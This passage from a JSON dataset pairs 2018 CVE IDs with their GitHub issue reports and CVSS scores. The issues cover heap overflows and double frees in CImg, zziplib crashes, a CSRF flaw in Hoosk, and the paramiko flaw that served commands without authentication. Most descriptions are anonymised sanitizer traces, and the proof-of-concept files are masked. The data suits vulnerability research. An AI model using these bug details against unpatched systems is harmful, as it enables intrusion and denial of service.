  32274. "description": "invalid free in APITAG (in input APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32276. "severity": "CRITICAL",
  32277. "baseScore": 9.8,
  32278. "impactScore": 5.9,
  32279. "exploitabilityScore": 3.9
  32280. },
  32281. {
  32282. "CVE_ID": "CVE-2018-7588",
  32283. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/183",
  32284. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/183",
  32285. "Repo_new": "greyclab/cimg",
  32286. "Issue_Created_At": "2018-03-01T04:17:41Z",
  32287. "description": "a heap overflow when load a bmp image. a heap overflow occurs when load a crafted bmp image using cimg. the bug report as following with address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG ff NUMBERTAG at pc NUMBERTAG dd NUMBERTAG bp NUMBERTAG ffee7a8e NUMBERTAG sp NUMBERTAG ffee7a8e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG ff NUMBERTAG thread T NUMBERTAG dd NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f NUMBERTAG bb8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ca NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fb6 in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG ff2af NUMBERTAG eb NUMBERTAG ff2af NUMBERTAG ec NUMBERTAG ff2af NUMBERTAG ed NUMBERTAG ff2af NUMBERTAG ee NUMBERTAG ff2af NUMBERTAG ef NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the testcase please refer: URLTAG",
  32288. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32289. "severity": "HIGH",
  32290. "baseScore": 7.8,
  32291. "impactScore": 5.9,
  32292. "exploitabilityScore": 1.8
  32293. },
  32294. {
  32295. "CVE_ID": "CVE-2018-7589",
  32296. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/184",
  32297. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/184",
  32298. "Repo_new": "greyclab/cimg",
  32299. "Issue_Created_At": "2018-03-01T04:25:13Z",
  32300. "description": "double free when load bmp image. a double free when load a crafted image using cimg. the tested code commit is APITAG reports by the address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbc NUMBERTAG in _IO_default_finish ( PATHTAG NUMBERTAG f1be NUMBERTAG bd NUMBERTAG e in fclose ( PATHTAG NUMBERTAG f1be4f6f7cd in fclose ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ) APITAG NUMBERTAG b NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f1be NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbe3c in _IO_default_finish ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f1be4f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1be NUMBERTAG bd1d4 in _IO_file_doallocate ( PATHTAG ) SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING poc: URLTAG",
  32301. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32302. "severity": "HIGH",
  32303. "baseScore": 7.8,
  32304. "impactScore": 5.9,
  32305. "exploitabilityScore": 1.8
  32306. },
  32307. {
  32308. "CVE_ID": "CVE-2018-7590",
  32309. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/45",
  32310. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/45",
  32311. "Repo_new": "havok89/hoosk",
  32312. "Issue_Created_At": "2018-03-01T08:28:19Z",
  32313. "description": "CSRF issue that allow to attacker create an account. Hello. I want to report this CMS has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content CODETAG NUMBERTAG And account username = APITAG is created without admin user's intention.",
  32314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32315. "severity": "HIGH",
  32316. "baseScore": 8.8,
  32317. "impactScore": 5.9,
  32318. "exploitabilityScore": 2.8
  32319. },
  32320. {
  32321. "CVE_ID": "CVE-2018-7637",
  32322. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/185",
  32323. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/185",
  32324. "Repo_new": "greyclab/cimg",
  32325. "Issue_Created_At": "2018-03-02T03:40:55Z",
  32326. "description": "other testcases lead to heap overflow by loading crafted images. A heap overflow occurs at different location in APITAG when loading the crafted image file . the tested code commit is APITAG the reports with address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef9c at pc NUMBERTAG bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef9c thread T NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f injjj main PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef9c is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG f NUMBERTAG a6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f in APITAG int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG f4 in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9df NUMBERTAG fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING pocs : URLTAG URLTAG URLTAG URLTAG URLTAG",
  32327. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32328. "severity": "HIGH",
  32329. "baseScore": 7.8,
  32330. "impactScore": 5.9,
  32331. "exploitabilityScore": 1.8
  32332. },
  32333. {
  32334. "CVE_ID": "CVE-2018-7648",
  32335. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1088",
  32336. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1088",
  32337. "Repo_new": "uclouvain/openjpeg",
  32338. "Issue_Created_At": "2018-02-22T01:09:33Z",
  32339. "description": "sprintf buffer overflow. URLTAG Hello, it looks like this APITAG could overflow the buffer that is supplied for it. Thanks",
  32340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32341. "severity": "CRITICAL",
  32342. "baseScore": 9.8,
  32343. "impactScore": 5.9,
  32344. "exploitabilityScore": 3.9
  32345. },
  32346. {
  32347. "CVE_ID": "CVE-2018-7652",
  32348. "Issue_Url_old": "https://github.com/dotse/zonemaster-gui/issues/217",
  32349. "Issue_Url_new": "https://github.com/zonemaster/zonemaster-gui--archived-old-version-not-to-be-used/issues/217",
  32350. "Repo_new": "zonemaster/zonemaster-gui--archived-old-version-not-to-be-used",
  32351. "Issue_Created_At": "2018-02-19T13:39:51Z",
  32352. "description": "Update GUI security. Update GUI for security reasons (escape HTML)",
  32353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32354. "severity": "MEDIUM",
  32355. "baseScore": 6.1,
  32356. "impactScore": 2.7,
  32357. "exploitabilityScore": 2.8
  32358. },
  32359. {
  32360. "CVE_ID": "CVE-2018-7662",
  32361. "Issue_Url_old": "https://github.com/CouchCMS/CouchCMS/issues/46",
  32362. "Issue_Url_new": "https://github.com/couchcms/couchcms/issues/46",
  32363. "Repo_new": "couchcms/couchcms",
  32364. "Issue_Created_At": "2018-03-04T06:15:02Z",
  32365. "description": "phpmailer.php and FILETAG leak disclosure the full path. Location: APITAG and APITAG Rows NUMBERTAG Harm: Web Site physical path leakage . FILETAG FILETAG",
  32366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  32367. "severity": "MEDIUM",
  32368. "baseScore": 5.3,
  32369. "impactScore": 1.4,
  32370. "exploitabilityScore": 3.9
  32371. },
  32372. {
  32373. "CVE_ID": "CVE-2018-7712",
  32374. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10998",
  32375. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10998",
  32376. "Repo_new": "opencv/opencv",
  32377. "Issue_Created_At": "2018-03-06T06:20:03Z",
  32378. "description": "assertion failure cause a denial of service . In some cases, an assertion failure may be intentional behavior, not a vulnerability, However, Assertion failure may cause denial of service attacks in some cases. And CVE IDs have been assigned such as CVETAG , CVETAG , CVETAG .",
  32379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  32380. "severity": "HIGH",
  32381. "baseScore": 7.5,
  32382. "impactScore": 3.6,
  32383. "exploitabilityScore": 3.9
  32384. },
  32385. {
  32386. "CVE_ID": "CVE-2018-7725",
  32387. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/39",
  32388. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/39",
  32389. "Repo_new": "gdraheim/zziplib",
  32390. "Issue_Created_At": "2018-03-06T01:56:42Z",
  32391. "description": "Invalid memory address dereference in zzip_disk_fread (in APITAG . Hi,it's a issues about the zziplib NUMBERTAG It crashed in function zzip_disk_fread.the details are below(ASAN): ./unzzip mem NUMBERTAG null p ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ffff7fec NUMBERTAG pc NUMBERTAG ffff5d NUMBERTAG bd bp NUMBERTAG e NUMBERTAG sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG ffff5d NUMBERTAG bc in inflate ( PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_disk_fread PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_mem_disk_fread PATHTAG NUMBERTAG in unzzip_mem_disk_cat_file PATHTAG NUMBERTAG ae8 in unzzip_cat PATHTAG NUMBERTAG f NUMBERTAG in unzzip_extract PATHTAG NUMBERTAG e3 in main PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG inflate NUMBERTAG ABORTING POC FILE: URLTAG",
  32392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32393. "severity": "MEDIUM",
  32394. "baseScore": 6.5,
  32395. "impactScore": 3.6,
  32396. "exploitabilityScore": 2.8
  32397. },
  32398. {
  32399. "CVE_ID": "CVE-2018-7726",
  32400. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/41",
  32401. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/41",
  32402. "Repo_new": "gdraheim/zziplib",
  32403. "Issue_Created_At": "2018-03-06T09:43:27Z",
  32404. "description": "Bus error in __zzip_parse_root_directory (in APITAG In APITAG NUMBERTAG there is a bus error caused by the __zzip_parse_root_directory function of zzip/zip.c. attackers could leverage this vulnerability to cause a denial of service via a crafted zip file. To reproduce the issue, run: ./zzdir $POC: ERRORTAG POC FILE: URLTAG",
  32405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32406. "severity": "MEDIUM",
  32407. "baseScore": 6.5,
  32408. "impactScore": 3.6,
  32409. "exploitabilityScore": 2.8
  32410. },
  32411. {
  32412. "CVE_ID": "CVE-2018-7727",
  32413. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/40",
  32414. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/40",
  32415. "Repo_new": "gdraheim/zziplib",
  32416. "Issue_Created_At": "2018-03-06T02:34:16Z",
  32417. "description": "There are memory leaks in zziplib NUMBERTAG which is trigged in zzip_mem_disk_new(in APITAG There are some memory leaks in zziplib which is trigged in function zzip_mem_disk_new(in APITAG Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32418. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32419. "severity": "MEDIUM",
  32420. "baseScore": 6.5,
  32421. "impactScore": 3.6,
  32422. "exploitabilityScore": 2.8
  32423. },
  32424. {
  32425. "CVE_ID": "CVE-2018-7738",
  32426. "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/539",
  32427. "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/539",
  32428. "Repo_new": "util-linux/util-linux",
  32429. "Issue_Created_At": "2017-11-16T08:19:53Z",
  32430. "description": "Bash completion for umount fails if mount point contains a space. Arch Linux, util linux version NUMBERTAG For example, the mount point APITAG : $ cat /proc/mounts | grep media /dev/sdb1 PATHTAG vfat APITAG APITAG ro NUMBERTAG I type APITAG and it gets completed to APITAG . Maybe umount URLTAG should take a page from the book of bash completions URLTAG and parse APITAG , instead of mount output. (I originally thought this was a bug URLTAG in APITAG , until I realized that my distro replaces its umount completion in favour of that from APITAG .)",
  32431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  32432. "severity": "HIGH",
  32433. "baseScore": 7.8,
  32434. "impactScore": 5.9,
  32435. "exploitabilityScore": 1.8
  32436. },
  32437. {
  32438. "CVE_ID": "CVE-2018-7745",
  32439. "Issue_Url_old": "https://github.com/cobub/razor/issues/161",
  32440. "Issue_Url_new": "https://github.com/cobub/razor/issues/161",
  32441. "Repo_new": "cobub/razor",
  32442. "Issue_Created_At": "2018-03-07T15:37:38Z",
  32443. "description": "Some vulnerability NUMBERTAG create user without login Just update the url without login, the test user will be create. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG add data without login and execute evil code. Change the channel_id then Open html page even without APITAG admin access PATHTAG ,the evil code will execute. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG \" /> APITAG APITAG APITAG APITAG APITAG",
  32444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  32445. "severity": "HIGH",
  32446. "baseScore": 7.5,
  32447. "impactScore": 3.6,
  32448. "exploitabilityScore": 3.9
  32449. },
  32450. {
  32451. "CVE_ID": "CVE-2018-7750",
  32452. "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1175",
  32453. "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1175",
  32454. "Repo_new": "paramiko/paramiko",
  32455. "Issue_Created_At": "2018-03-13T00:02:03Z",
  32456. "description": "Server implementation does not check for auth before serving later requests. What follows is a direct paste from a private gist used to workshop the issue a bit late last week; have completed tests/impl (from NUMBERTAG and will be pushing those shortly. (wanted the issue number set in stone APITAG We have a CVE for this issue: CVETAG . Intro Email from one Matthijs Kooijman ( MENTIONTAG URLTAG dated APITAG notes that Paramiko's server implementation may be connected to by clients that do not implement the auth step, and happily serves up commands/etc to such un authed clients. He found that APITAG (another Python lib that does not use Paramiko) has the same issue. Finally, he states the RFC is unclear as to whether this is purposeful. Let's double check both the RFCs and then our favorite reference implementation, APITAG Should neither provide a useful clue, my gut says the server implementation should track whether we've sent APITAG NUMBERTAG sure we already do track this) and default to rejecting any connection level messages (like APITAG or APITAG ) unless that flag is True. RFC scan tl;dr it is indeed kinda vague, there are two kinda disagreeing undercurrents, neither of which are ironclad: It is _assumed_ that the connection protocol (which is where command exec occurs) runs on top of / after setting up, the transport (initial PATHTAG ) and auth (user auth) protocols. The specific server implementation, and/or operator of an instantiation of such an implementation, has _significant leeway_ in how they implement and/or configure the server, re: when and how user auth occurs. Specifics: RFC NUMBERTAG protocol arch NUMBERTAG URLTAG : pretty clear that the intent is that a user auth step always occurs, followed by a service request: > The client sends a service request once a secure transport layer > connection has been established. A second service request is sent after > user authentication is complete. FILETAG : third bullet point re: policy issues that 'SHOULD' be addressed, highlights that auth specifics are up to the site/operator: > The authentication methods that are to be required by the server for > each user. The server's policy MAY require multiple authentication for > some or all users. The required algorithms MAY depend on the location > from where the user is trying to gain access. FILETAG : this whole section arguably applies, but it's very vague. However it _seems_ to back up my hunch that at core, this is up to the server implementer and/or operator, e.g: > At the discretion of the implementers, this default policy may be along > the lines of anything goes where there are no restrictions placed upon > users ...] RFC NUMBERTAG auth protocol NUMBERTAG URLTAG : more vague implications that the server can do whatever it wants, e.g. the below quote about none auth implies the authors at least partly considered servers that intentionally don't care about auth at all (though the specific discussion is about the actual, explicit use of the none auth type message, which is distinct from \"did not submit auth at all\"): > The \"none\" method is reserved, and MUST NOT be listed as supported. > However, it MAY be sent by the client. The server MUST always reject > this request, unless the client is to be granted access without any > authentication, in which case, the server MUST accept this request. FILETAG : this (like NUMBERTAG states that the server should start up the requested service after sending auth success. One could read this to imply that services SHOULD NOT start UNLESS auth has occurred, but it's not explicit NUMBERTAG URLTAG : notes that implementations MUST implement public key auth, though I note this is distinct from requiring that it is _enabled_ (clearly, many real servers only offer password auth, for example.) RFC NUMBERTAG transport protocol NUMBERTAG URLTAG : implies client may request \"a service\" after initial (high level) kex, where that service is one of userauth or connection. The transport level of the protocol thus doesn't appear to actually care or enforce that one performs auth before connection. RFC NUMBERTAG connection protocol NUMBERTAG URLTAG : once again implies that connection is \"designed to\" occur after/on top of auth NUMBERTAG URLTAG : again, it's 'assumed': > This protocol is assumed to run on top of a secure, authenticated > transport. User authentication and protection against network level > attacks are assumed to be provided by the underlying protocols. APITAG implementation My old friend and the only C codebase I have any familiarity with whatsoever, openssh portable URLTAG ... Synopsis After all the below, the tl;dr seems to be: APITAG sets up a dispatch table to determine how it responds to protocol messages/packets This table gets reinitialized depending on 'phase' of execution: while awaiting auth, it is only set to respond to auth related messages, then after successful auth, it retools the table to only respond to post auth related messages like channel opens. Thus, the case under test ends up being a simple APITAG even are you talking about? What's a channel open?\" ERRORTAG style situation no auth step, no idea how to handle anything beyond auth. Deep dive Main SSH2 server loop is APITAG > APITAG Which uses a dispatch table to handle inbound messages: URLTAG Which dispatches to other functions, so when it sees eg APITAG it calls APITAG : URLTAG Which is defined here: URLTAG If the user is asking for command exec, that's channel type session : URLTAG Which calls APITAG : URLTAG Which calls APITAG with a handle on APITAG : URLTAG This is our first apparent reference to anything auth related so far... The only other apparent external context is the ssh object used to get the actual channel in play on the call prior: URLTAG That auth context object is extern 'd at top of file: URLTAG We'll dig into that later if necessary but for now, let's assume it has handy ways of telling whether the user is authed or not, and the question is whether/how those are consulted. APITAG is, bizarrely, defined in APITAG : URLTAG It checks for APITAG (or a null password entry) and gets mad if not true: URLTAG So yea, we gotta doublecheck what that APITAG member actually maps to. Authctxt struct is defined in APITAG here: URLTAG It has a bunch of flags, of which success , authenticated , and valid all seem relevant. success is not documented; authenticated sounds like it maps to, well, authentication (user is who they claim to be) with valid mapping to (a generic level of) authorization (the user is actually allowed to login.) Those flags (esp valid ) aren't set in too many places; the most useful and in retrospect most obvious place is in handling of userauth requests: URLTAG The core of this is actually use of Authmethod structs ( format defined here URLTAG created by the various APITAG modules (one for each implemented auth backend kerberos, password, publickey, hostbased, etc) These are simple name , userauth , enabled structures, with userauth being a pointer to an implementation function (so e.g. the one for password auth is referencing APITAG in APITAG ( here URLTAG The per method userauth func is called and the result stored as authenticated var: URLTAG Which bubbles down (after much state machine checking) to finalizing userauth sending the success network message, updating APITAG , etc: URLTAG The APITAG flag seems to actually just be \"is the requested username a valid local system user\": URLTAG Note use of getpwnamallow , which (basically) wraps the syscall getpwnam aka \"get password entry for user\" (so APITAG is specifically that structure and not just a password) Which explains why it's distinct from success and authenticated . Initial distillation Seems at first that \"huh, the user can get a session as long as they exist locally, without necessarily passing auth\" which would be bad but would also act like Paramiko. However, realized: that APITAG flag is set by APITAG , meaning the client has to actually submit auth in order to set it. APITAG APITAG .) So if a user attempts to send a channel open request without authing, both APITAG and APITAG will be null, and thus APITAG should call line NUMBERTAG URLTAG and thus result in APITAG . Testing with live APITAG server Proving this with a live install is interesting: Ran local docker container executing Ubuntu + APITAG NUMBERTAG on port NUMBERTAG with nothing but root password auth by default Executed Matthijs's APITAG with nothing but the port number changed Did not get expected no user for session but instead seem to have just confused the poor thing: ERRORTAG Second dive The above protocol error log message comes out of here: URLTAG in ERRORTAG Which is stuffed into newly initialized dispatch tables by ssh_dispatch_init URLTAG Which is done via APITAG here: URLTAG So the tl;dr is that the dispatch table gets all NUMBERTAG slots filled initially by ERRORTAG , then the table is filled in with what is intended to be responded to (e.g. in APITAG , the very next line is to say \"ok and now respond to service requests\" URLTAG E.g. slot NUMBERTAG corresponds to APITAG , aka what our test client was requesting: FILETAG Looks like in the normal flow of things, the post auth process ends up reinitializing the dispatch table with acceptable messages (including channel opens): Server loop emits APITAG interactive session\" log message one can see in a successful regular auth+shell: URLTAG Then calls APITAG : URLTAG Which does aforementioned dispatch reset & fill in: URLTAG End result The RFC isn't terrifically clear beyond \"well, we kind of assume you're not gonna open channels and such unless you've already authed\", but it's not a SHOULD or a MUST . APITAG has chosen to implement this as a strict \"only respond to the messages you can handle at the current stage\" setup, where auth comes before connection (as in the RFC.) Trying to do things out of order results in a simple ERRORTAG . Paramiko does not do things quite that way: instead, as one might guess from the bug description, it simply sets up all possible dispatch targets (anything implemented by the Transport across its two handler tables, and the APITAG handler table) and then dispatches depending on message type: URLTAG Doing nothing certainly seems like a bad idea: this is clearly a massive security flaw, and the only reason I did all the above investigation is because software has an irritating history of \"but I was _relying_ on that bug / looseness in the spec / whatever!\". Given the main reference implementation disallows it, I'm inclined to assume nobody could possibly rely on this. So there's two obvious fixes for Paramiko: The APITAG is the Bible\" approach: update Transport's dispatching to be more like APITAG and only enable certain message types depending on the state of APITAG (which, impressively, appears to only ever be used in APITAG ...!!!) This could be problematic given that Transport is frustratingly bimodal and is used both for server _and_ client operations we'd have to make sure that we're not preventing a not yet authed client from dispatching on necessary responses because it's not authed yet, for example. Of note, APITAG is taking this approach in their fix, and are simply leveraging the fact that RFC NUMBERTAG compatible protocol numbers mean one can just go \"is the message identifier greater than the highest possible auth related number? Are you authed yet? No? Screw off!\" seems possible on our end, though doesn't really change the previous point about ensuring client side cases are protected. The \"that's too much work right now\" approach: simply rub some more references to APITAG and/or APITAG in specific spots such as APITAG ( here URLTAG Except this, too, is problematic because of how Transport, Server and APITAG split up responsibilities & exposures to one another. By default a Server has no direct access to the Transport running it, or that Transport's APITAG (which, in server mode, is set up during rekeying [including initial kex].) Changing this would be backwards incompatible (e.g. enforcing an actual APITAG on Server subclasses for the passing in of a reference to one of the other objects, since right now Server doesn't even define one!) though I would like to examine it sometime. Now probably not the best time though. Could still put specific, small scoped changes in Transport though, such as around the APITAG calls here: URLTAG My gut says to take a quick stab at the NUMBERTAG st approach but to fall back to the NUMBERTAG nd if the NUMBERTAG st cannot be done relatively painlessly. Either way, re: the actual action to take seems poorly defined, but esp given APITAG simply spits out a bunch of question marks and not a \"useful\" error; the RFCs NUMBERTAG list only NUMBERTAG default 'error' types, of which APITAG seems the closest fit. And indeed Paramiko uses it for eg bogus channel types, in some legacy tests.",
  32457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32458. "severity": "CRITICAL",
  32459. "baseScore": 9.8,
  32460. "impactScore": 5.9,
  32461. "exploitabilityScore": 3.9
  32462. },
  32463. {
  32464. "CVE_ID": "CVE-2018-7752",
  32465. "Issue_Url_old": "https://github.com/gpac/gpac/issues/997",
  32466. "Issue_Url_new": "https://github.com/gpac/gpac/issues/997",
  32467. "Repo_new": "gpac/gpac",
  32468. "Issue_Created_At": "2018-02-26T09:11:01Z",
  32469. "description": "Stack buffer overflow in avc_parsers.c. The stack buffer overflow occurs here URLTAG : APITAG I don't know exactly how APITAG works, but it seems to return a APITAG . The size of APITAG is only NUMBERTAG entries, so we can get this to overflow. The sps variable is a stack variable that comes from a parent function, for example in APITAG . Using this bug, I can craft an MP4 file that can overwrite anything above this variable in the stack, such as other fields in APITAG , stack variables, etc.",
  32470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32471. "severity": "HIGH",
  32472. "baseScore": 7.8,
  32473. "impactScore": 5.9,
  32474. "exploitabilityScore": 1.8
  32475. },
  32476. {
